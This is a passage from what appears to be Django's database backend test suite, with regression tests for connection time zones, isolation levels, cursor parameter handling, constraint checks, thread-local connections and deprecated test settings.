def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
